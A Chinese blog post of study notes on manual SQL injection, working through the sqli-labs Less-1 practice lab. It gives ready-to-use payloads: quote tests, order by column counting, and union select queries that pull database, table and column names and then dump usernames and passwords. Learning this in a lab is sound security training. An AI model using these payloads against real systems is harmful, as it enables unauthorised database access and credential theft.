SQL注入笔记(二)

已于 2022-07-23 09:24:51 修改
阅读量1.7k 收藏 1
点赞数 1
分类专栏: SQL 文章标签: sql mysql 数据库
于 2022-07-22 22:06:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53815779/article/details/124524845
版权

目录

​编辑

SQL注入原理及使用

SQL注入原理

SQL注入的分类

手动SQL注入

使用order by判断表中字段的数量

常见的手动sql注入闭合方式

union 联合查询注入

利用SQL注入获取数据库的名称

获取security数据库中的表

group_concat()

获取表中的字段

 获取用户名及密码

SQL注入的基本过程图

14e9dcfdd7944542a50bde77049a3e84.png

SQL注入原理及使用

SQL注入原理

SQL注入攻击:SQL注入攻击的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。根据相关技术原理,SQL注入可以分为平台层和代码层注入。

apache 主要是提供web服务,做html页面

php 是程序,动态语言

mysql 用于管理数据。

用户登录:

select * from users where username='用户名' and password='密码';

用户输入可控的:'or 1=1

select * from users where username=''or 1=1 -- ' and password='';

        其中1=1永远为真,所以当前SQL语句无论怎么执行,结果永远为真,--空格表示注释,注释后面所有代码不再执行。

d0dc595f4e964febb2c48aa7dadfdd82.png

单引号的作用:

        在提交数据或URL中添加单引号进行提交,如果返回SQL错误即可判断当前位置存在SQL注入漏洞,原因是没有被过滤。

select * from users where username=''' and password='';

以上的这条语句会进行报错:

        提交单引号,没有被过滤,而直接带入到数据库执行。

SQL注入的分类

         SQL注入根据在注入的方式进行分类,分为以下4类:

  1. 布尔注入:可以根据返回内容判断,条件真假的注入。
  2. 联合注入:可以使用union的注入。
  3. 延时注入:不能根据页面返回内容判断任何信息,用条件语句查看时间延时语句是否执行(即页面返回时间是否增加)来判断。   
  4. 报错注入:页面会返回错误信息,或者报注入语句的结果直接返回在页面中。   

以上是根据常见的注入方式进行的分类,但是通常来说SQL注入只分为字符型数字型比如:

数值型: 1 or 1 = 1

字符型: 1' or '1' = '1             需要单引号或双引号括起来的,并且执行生效了就是字符型,否则是数值型。这也是判断两者的条件。

手动SQL注入:

这里用了sqli-labs来进行讲解

打开sqli-labs,选择Less-1,然后在URL后面指定?id=1

6ddfed0b2d4e49e4ad34d0e2b0029b2b.png

 页面正常,请求数据正常返回。

        接下来,给id=1参数加一个单引号,看一下会出现什么状态。

62a2d720d3c04a8c901ed5dbac25fc7f.png

页面返回报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 

5a3eb38dadde4ab1a0c3e2a3e48a8011.png

 我们把报错的信息复制出来分析:

''1'' LIMIT 0,1'

去掉外面的单引号后:

'1'' LIMIT 0,1

注:外面的单引号是报错信息用来框柱报错的信息的

此时,报错信息是:'1'' LIMIT 0,1 ,那么在数据库里,单引号和双引号都是两两一闭合,现在多了个单引号,闭合错误,出现报错。

我现在在id=1'的后面多加一个单引号,页面正常返回信息,因为此时有四个单引号了,两两一闭合,闭合成功,所以没有出现报错。

8d29727a7f2b4d5399ea9218073071b8.png

limit主要是用于限制输入结果的数量

其语法格式:LIMIT [位置偏移量] ,取的总行数    例如:limit 3,7

举个栗子:

我只要users表的五行,执行命令

186a092a83c845809ab3989bdfeffcd2.png

 limit 5  就显示5行。

我要从第三行开始开始,显示五行

469f462870414a688596122a6faedabd.png

 limit 2,5  :2是位置偏移量,从2后面开始显示。5是取得总行数,显示5行。

我只要第一行

bc86a04578bc43d693f6e0b82e76c789.png

 limit 0,1  :从0后开始显示,显示一行

查看页面源代码

vim /var/www/html/sqli-labs/Less-1/index.php

在文件的第29行的代码,可以用:set nu 来显示行数。

5c52e3007c934d3e9f83f69adb58a173.png

 按照我的想法是:id 第于几,就只显示那一行,因为limit 0,1 。例如id=6,那么页面就显示id=6的信息。

使用order by判断表中字段的数量

这里使用了一个hackbar插件,可能需自己安装一下

使用hackbar:http://192.168.0.109/sqli-labs/Less-1/?id=1' order by 3 --+

0e50aca33d554bea9e9a7b98826afd78.png

 显示正常

语句变化过程:

原语句

select * from users where id='$id' limit 0,1

被注入后的语句:

select * from users where id='1' orser by 3 -- ' limit 0,1

我order by 4 试一下,发现报错了,所以只有3个字段

6f8bf440b6424a9985b10a82269d54b6.jpeg

常见的手动sql注入闭合方式:

http://192.168.0.109/sqli-labs/Less-1/?id=1\

956787cd61244ddbac4174723c480d00.png

注:\(反斜杠)表示转义,指的是把带有特殊意义的字符或符号,转换为没有特殊含义的字符。

union 联合查询注入:

        作用:把一条或多条查询语句的查询结果合并显示。

        注意:多个select查询的条件字段数需要统一。

SQL union语法:

select column_name(s) from table_name1 union select column_name(s) from table_name2;

        使用联合查询爆出字段前,我们需要了解union的使用方法。

union联盟

        union操作符用于合并两个或者多个select语句的结果集。

        注意:union内部的select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条select语句中的列的顺序必须相同。

举个栗子:

先显示users的字段和1,2 ,发现报错了,报错信息为:使用的SELECT语句的列数不同。我们在1,2 后面加上3,成功了...列的数量相同

a0bd4fd86f9f407382d7f9b553c481c0.png

在hackbar:

http://192.168.0.109/sqli-labs/Less-1/?id=1' union select 1,2,3 --+

页面显示了,id=1的信息,没有显示union后的信息,因为页面只有一个位置显示,所以不能显示多个信息

3c7bae6c42a2481bb08388a70faffa9c.png

 http://192.168.0.109/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+

我们把id=1改为id=-1,主要是把原有的值改成一个表中不存在的值,让页面的显示位置来显示union后的查询。

3e274ccb08114787812b3f59af76c0ce.png

 显示出了2和3,为什么1不显示呢?因为1和id同列,所以不显示,把123的顺序换一下就可以看出来了

4589c25241e4446f9db8548c4f3510b0.png

利用SQL注入获取数据库的名称:

http://192.168.0.109/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+

在2的位置上填入database()来获取数据库名

fce81e8d81db46428f107414cce17695.png

 在数据库执行:

f74564448afe4475af35cc263721388a.png

mysql的其他函数(这里写了常用的)

varsion()                                       #mysql版本

user()                                           #数据库用户名

database()                                   #数据库名

@@datadir                                  #数据库路径

@@version_compile_os              #操作系统版本

注:查询mysql以外的要加两个@。

获取security数据库中的表

        information_schema,这是mysql自带的一个元数据库,用于存储mysql的数据结构。

        元数据则是用于描述数据库本身的书库,称为元数据,包含了,mysql当中有多少个数据库,这些数据库的名称是什么,每个数据库里有多少个表,具体的表名叫什么。

例:查看information_schema库中tables表中table_schema等于security的相关信息。

b3fd802c16894090885effc7c0465e35.png

说明:

information_schema库中的tables表的字段解释:

table_schema      #该字段存储数据库名;

table_name         #该字段存储对应数据库中的包括表名。

information_schema     主要是用于存放mysql的元数据。

tables表:主要是记录mysql当中的所有库及所有表,该表的字段table_schema(用于记录库名)table_name(用于记录表名)。 

select table_schema,table_name from information_schema.tables where table_schema='security';

columns表:主要是用于记录库中的表,表中的字段。该表的字段table_schema(用于记录库名),table_name(用于记录表名),olumn_name(用于记录字段名)

select table_schema,table_name,column_name from information_schema.columns where table_name='users' and table_schema='security';

148b3882349b4f75aff7fb9db56d114e.png

group_concat()

         该函数功能:将where条件匹配到的多条记录接连成一个字符串。

这里把table_name(即表名)连接成一个字符串。

select group_concat(table_name) from information_schema.tables where table_schema='security';

e88d6919478449d6add158f0d654a6bc.png

这在只有一个回显位置时,是非常好用的

例如:

http://192.168.0.109/sqli-labs/Less-1/?id=-1' union select 1,4,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5ec11897f90340eea752442138031a6e.png

获取表中的字段

information_schema元数据库下的columns表,主要是用于存放mysql中的所有表中的字段及类型。

5be95a66803e42729cae7829b6267045.png

http://192.168.0.109/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),1 from information_schema.columns where table_name='users' and table_schema='security'--+

05cd7f0fe850455cae2d309d9113dbec.png

 获取用户名及密码

        得知库名称为:security,此库中有users表,users表中的字段id,username,password

select group_concat(username,0x3a,password) from users;

aaba709c03ec45199530046e9a26ea85.png

 说明:

0x3a:0x 十六进制的标志符,0x3a在ASCII码表示:冒号

在hackbar:

http://192.168.0.109/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users--+

输出是一条的太长了,看起来很麻烦

659924a7599c463ab6b2d73f42b35055.png

 加上换行符:

http://192.168.0.109/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password,0x3C,0x68,0x72,0x2F,0x3E) from users--+

每个id都一行一行的排好

632ee23328dd4ea9b79fabce08a3b63e.png

 说明:

换行符为<hr/>,0x3a是<;0x68是h;0x72是r;0x2F是/;0x3E是> 。拼起来就是<hr/>

<hr/>是html的代码,所以可以在网页上执行。

这个sql2在草稿箱呆了很久,今天终于搞定...

这是我的学习笔记,不懂的可以私信问哦

腿没发霉的霉腿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入笔记
m0_62617107的博客
05-14 338
数据库基础 1.Mysql基础操作 2.Mysql表一些基本操作 3.Mysql的常用变量(函数) 4.Mysql的常用符号 1. & and 2. || or 3. xor 5.Mysql的常用函数 什么是SQL注入? 对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾,添加额外的SQL语句 SQL注入的危害 ·数据库信息泄露:数据库中存放的用户的隐私信息的泄露 ·网页篡改:通过操作数据库对特定网页进..
SQL注入笔记
weixin_65176639的博客
04-07 161
SQL注入简介: Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。 四种基本SQL注入的方式 联合注入 基于错误的注入 布尔盲注 延时注入 使用
SQL中的转义字符
12-14
之前写了篇文章《Oracle转义字符》,说到了Oracle中单引号“’”的转义字符是单引号“’”,那么其他的特殊字符的转义字符又是什么呢,如模糊查询的占位符“%”,“_”等。   经过测试,在Oracle中不能再使用单引号“’”来转义“%”,“_”了,而是用反斜杠“”,不仅如此,还要声明反斜杠“”是转义字符。   假设表为tb,字段为col,要在col中查询包含“%”或“_”字符的字段,sql如下:   – Oracle   select * from tb where col like '%\%%' or col like '%\_%' escape ''   sql中“escap
MYSQL ‘单引号转义 \反斜杠转义
lwpoor123的博客
05-08 2万+
1、单引号 ' 转义 今天写mysql的时候遇到一个问题,当传入的mysql语句的参数中含有单引号就会出现问题,这久需要用到转义,其实非常简单,就是使用 .Replace("'", "''") 把参数中的一个单引号替换为两个单引号 。 具体使用: select '''测试' as test 运行结果: 具体开发可使用 Replace 替换 单引号: string parm1 = "'测试".Replace("'", "''"); string sql = string.Format.
MySQL中执行sql语句反斜杠需要进行转义否则会被吃掉
sunsijia21983的博客
04-15 2654
本来想写一个 更新替换字符串 update question set metas=REPLACE(metas,"D\uff0e"," ") where id = 27438 我的数据库里面有这个字段 但是替换一直不成功 然后咨询朋友 D\uff0e 发现是转义的原因 中间加了\可以了 update question set metas=REPLAC...
SQL注入——使用转义符“\“
lzu_lfl的博客
03-22 3359
sql注入、转义符反斜杠在sql注入中的应用、盲注脚本的编写
sql 转义字符(反斜杠问题)
xxxvshell的博客
10-25 1万+
 关于sql中的转义字符,记录一下:     实验环境: mySql     where  xxx =  '检索条件'    -&gt;  默认特殊字符: ' \ (单引号,反斜杠)     where  xxx like '检索条件'  -&gt;  默认特殊字符: ' \  _ % (单引号,反斜杠,下划线,百分号)   对应上述问题,可以在java端进行转义 public ...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入笔记
03-15
SQL 注入笔记 SQL 注入是一种常见的 Web 应用程序漏洞,攻击者可以通过inject恶意 SQL 代码来访问、修改或控制数据库中的数据。本文将详细介绍 SQL 注入的基本概念、检测方法和防御策略。 什么是 SQL 注入SQL ...
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 手工注入是指攻击者通过构造特殊的输入来inject恶意的 SQL 代码,使得数据库执行恶意的操作。手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、...
sql中下划线的转义
enthan809882的博客
10-19 7581
场景 查下w_开头的用户名。 过程 语句为: select * from user where user_name like 'w_%'; 发现查出的结果明显不对,这是怎么回事呢? 原因: 在sql中, 下划线_表示匹配任意单个字符。 使用的时候有2点: 1、 前面加右斜杠表示转义,如\_表示下划线。 2、后面加 escape '\' 指明转义字符是右斜杠。 正确的写法: select * from user where user_name like '%w\_%' escape '\'; ...
sql注入手法详解
m0_71299382的博客
11-26 1万+
sql注入总结
sql注入总结
thinszx的博客
09-23 486
GBK宽字节注入 条件 数据库支持,并采用GBK格式进行编码 在获取url数据时,使用addslashes或是其他方式对单引号'进行了转义,使其变成了\',php的GET、POST等方法默认都会进行此操作 上面的两个条件缺一不可,gbk编码不太好确定,但是第二个比较好确认,例如输入的url为?id=1',返回了?id=1\' 利用 当遇到上述的两个反斜杠时,可以有以下两种思路: 把\也给转义掉,比如用三个斜杠\\\ gbk宽字节注入 gbk编码会把连续的两个字符视作是一个汉字字符,当且仅当第一个字符
MySQL中执行sql语句反斜杠需要进行转义
device的博客
12-07 2万+
最近在执行一个sql备份的还原后,发现系统的部分路径找不到,于是开始debug,最后发现,是由于备份的sql语句在还原时,反斜杠(\)被mysql吃掉了。本文对反斜杠和顺斜杠进行了测试,并给出了解决方案。具体描述如下: 执行下面的sql语句: INSERT INTO `test` VALUES('123', 'document\101\1086.pdf', '101/1086.swf'); 结
Sql中存在斜杠“/”怎么办?
weixin_34050519的博客
11-09 2484
比如下面的语句 select concat(name,'/',description) from table1 这样的语句在数据库访问工具中执行没问题,到java中就报错。 解决办法也很简单,用单引号 ' 进行转义就行,如下: select concat(name,''/'',description) from table1 ...
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
最新发布
技术笔记
07-17 845
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
SQL注入攻防手册:MySQL与MSSQL函数与技巧
"这篇文档是关于手工SQL注入的常用语句和技巧的笔记,主要针对MySQL,也涉及了一些MSSQL的相关知识。" 在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序对用户输入数据的不当处理,使得恶意用户能够...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

腿没发霉的霉腿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值